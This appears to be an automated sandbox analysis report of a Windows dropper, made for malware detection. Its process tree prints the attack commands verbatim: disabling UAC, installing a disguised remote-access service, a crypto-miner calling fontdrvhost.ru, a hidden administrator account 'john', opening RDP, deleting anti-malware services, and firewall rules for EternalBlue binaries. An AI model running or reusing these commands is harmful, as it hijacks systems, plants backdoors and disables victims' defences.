LtHv0O2KZDK4M637.exe Token: 9920249032593447144 1192 LtHv0O2KZDK4M637.exe Token: 9920249032593447144 1192 LtHv0O2KZDK4M637.exe Token: 0 1192 LtHv0O2KZDK4M637.exe Token: 9920249032593447144 1192 LtHv0O2KZDK4M637.exe Token: 6937813002834471071 1192 LtHv0O2KZDK4M637.exe Token: 6937813002834471071 1192 LtHv0O2KZDK4M637.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
winit.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeaudiodg.exeMicrosoftHost.exepid process 2176 winit.exe 3628 rutserv.exe 504 rutserv.exe 696 rutserv.exe 2276 rutserv.exe 428 WinMail.exe 2872 WinMail.exe 1696 taskhost.exe 1296 taskhostw.exe 360 R8.exe 1732 winlogon.exe 2428 audiodg.exe 5208 MicrosoftHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
LtHv0O2KZDK4M637.exewini.exeWScript.execmd.exerutserv.exesys.execmd.exewinit.exeWinMail.exedescription pid process target process PID 1192 wrote to memory of 912 1192 LtHv0O2KZDK4M637.exe wini.exe PID 1192 wrote to memory of 912 1192 LtHv0O2KZDK4M637.exe wini.exe PID 1192 wrote to memory of 912 1192 LtHv0O2KZDK4M637.exe wini.exe PID 912 wrote to memory of 2912 912 wini.exe WScript.exe PID 912 wrote to memory of 2912 912 wini.exe WScript.exe PID 912 wrote to memory of 2912 912 wini.exe WScript.exe PID 912 wrote to memory of 2176 912 wini.exe winit.exe PID 912 wrote to memory of 2176 912 wini.exe winit.exe PID 912 wrote to memory of 2176 912 wini.exe winit.exe PID 2912 wrote to memory of 3556 2912 WScript.exe cmd.exe PID 2912 wrote to memory of 3556 2912 WScript.exe cmd.exe PID 2912 wrote to memory of 3556 2912 WScript.exe cmd.exe PID 3556 wrote to memory of 2060 3556 cmd.exe regedit.exe PID 3556 wrote to memory of 2060 3556 cmd.exe regedit.exe PID 3556 wrote to memory of 2060 3556 cmd.exe regedit.exe PID 3556 wrote to memory of 1428 3556 cmd.exe regedit.exe PID 3556 wrote to memory of 1428 3556 cmd.exe regedit.exe PID 3556 wrote to memory of 1428 3556 cmd.exe regedit.exe PID 3556 wrote to memory of 2204 3556 cmd.exe timeout.exe PID 3556 wrote to memory of 2204 3556 cmd.exe timeout.exe PID 3556 wrote to memory of 2204 3556 cmd.exe timeout.exe PID 3556 wrote to memory of 3628 3556 cmd.exe rutserv.exe PID 3556 wrote to memory of 3628 3556 cmd.exe rutserv.exe PID 3556 wrote to memory of 3628 3556 cmd.exe rutserv.exe PID 1192 wrote to memory of 2972 1192 LtHv0O2KZDK4M637.exe sys.exe PID 1192 wrote to memory of 2972 1192 LtHv0O2KZDK4M637.exe sys.exe PID 1192 wrote to memory of 2972 1192 LtHv0O2KZDK4M637.exe sys.exe PID 3556 wrote to memory of 504 3556 cmd.exe rutserv.exe PID 3556 wrote to memory of 504 3556 cmd.exe rutserv.exe PID 3556 wrote to memory of 504 3556 cmd.exe rutserv.exe PID 3556 wrote to memory of 696 3556 cmd.exe rutserv.exe PID 3556 wrote to memory of 696 3556 cmd.exe rutserv.exe PID 3556 wrote to memory of 696 3556 cmd.exe rutserv.exe PID 2276 wrote to memory of 2272 2276 rutserv.exe rfusclient.exe PID 2276 wrote to memory of 2272 2276 rutserv.exe rfusclient.exe PID 2276 wrote to memory of 2272 2276 rutserv.exe rfusclient.exe PID 2276 wrote to memory of 2072 2276 rutserv.exe rfusclient.exe PID 2276 wrote to memory of 2072 2276 rutserv.exe rfusclient.exe PID 2276 wrote to memory of 2072 2276 rutserv.exe rfusclient.exe PID 3556 wrote to memory of 3712 3556 cmd.exe attrib.exe PID 3556 wrote to memory of 3712 3556 cmd.exe attrib.exe PID 3556 wrote to memory of 3712 3556 cmd.exe attrib.exe PID 3556 wrote to memory of 3796 3556 cmd.exe attrib.exe PID 3556 wrote to memory of 3796 3556 cmd.exe attrib.exe PID 3556 wrote to memory of 3796 3556 cmd.exe attrib.exe PID 3556 wrote to memory of 2372 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2372 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2372 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2780 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2780 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2780 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2012 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2012 3556 cmd.exe sc.exe PID 3556 wrote to memory of 2012 3556 cmd.exe sc.exe PID 2972 wrote to memory of 3504 2972 sys.exe cmd.exe PID 2972 wrote to memory of 3504 2972 sys.exe cmd.exe PID 2972 wrote to memory of 3504 2972 sys.exe cmd.exe PID 3504 wrote to memory of 3452 3504 cmd.exe timeout.exe PID 3504 wrote to memory of 3452 3504 cmd.exe timeout.exe PID 3504 wrote to memory of 3452 3504 cmd.exe timeout.exe PID 2176 wrote to memory of 428 2176 winit.exe WinMail.exe PID 2176 wrote to memory of 428 2176 winit.exe WinMail.exe PID 2176 wrote to memory of 428 2176 winit.exe WinMail.exe PID 428 wrote to memory of 2872 428 WinMail.exe WinMail.exe -
System policy modification 1 TTPs 3 IoCs
TTPs:
Processes:
LtHv0O2KZDK4M637.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" LtHv0O2KZDK4M637.exe -
Views/modifies file attributes 1 TTPs 31 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 5164 attrib.exe 5432 attrib.exe 4196 attrib.exe 4240 attrib.exe 5260 attrib.exe 1264 attrib.exe 5168 attrib.exe 5732 attrib.exe 5352 attrib.exe 1156 attrib.exe 5548 attrib.exe 5536 attrib.exe 1452 attrib.exe 5672 attrib.exe 5564 attrib.exe 3712 attrib.exe 812 attrib.exe 5480 attrib.exe 5516 attrib.exe 2784 attrib.exe 5492 attrib.exe 5220 attrib.exe 1124 attrib.exe 3796 attrib.exe 5396 attrib.exe 5040 attrib.exe 1636 attrib.exe 1688 attrib.exe 2052 attrib.exe 1444 attrib.exe 5820 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"Drops file in Drivers directoryAdds Run key to start applicationChecks whether UAC is enabledModifies WinLogonNTFS ADSSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemorySystem policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxuiExecutes dropped EXEModifies registry classSuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 2Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstallExecutes dropped EXESuspicious use of AdjustPrivilegeTokenSuspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewallExecutes dropped EXESuspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /startExecutes dropped EXESuspicious use of AdjustPrivilegeTokenSuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\WindowsViews/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"Executes dropped EXEChecks processor information in registryModifies registry classSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOESuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOESuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
-
C:\Windows\SysWOW64\timeout.exetimeout 5Delays execution with timeout.exe
-
C:\ProgramData\install\sys.exeC:\ProgramData\install\sys.exeExecutes dropped EXELoads dropped DLLChecks processor information in registrySuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 3Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxuiExecutes dropped EXE
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"Drops file in Drivers directoryExecutes dropped EXEDrops file in Program Files directoryDrops file in Windows directorySuspicious use of SetWindowsHookEx
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exeExecutes dropped EXEAdds Run key to start applicationNTFS ADSSuspicious behavior: GetForegroundWindowSpamSuspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exeExecutes dropped EXESuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns
-
C:\Windows\system32\ipconfig.exeipconfig /flushdnsGathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force
-
C:\Windows\system32\gpupdate.exegpupdate /force
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exeExecutes dropped EXESuspicious use of SetWindowsHookEx
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t1Executes dropped EXESuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)Modifies file permissions
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exeExecutes dropped EXEModifies registry classSuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exeKills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exeKills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 3Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 1251
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rarExecutes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exeKills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout 2Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add
-
C:\Windows\SysWOW64\chcp.comchcp 1251
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -oExecutes dropped EXEModifies WinLogonDrops file in Program Files directory
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -wExecutes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"Drops file in Program Files directoryViews/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 2Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc
-
C:\Windows\SysWOW64\sc.exesc start appidsvc
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt
-
C:\Windows\SysWOW64\sc.exesc start appmgmt
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv
-
C:\Windows\SysWOW64\sc.exesc delete swprv
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_64
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
-
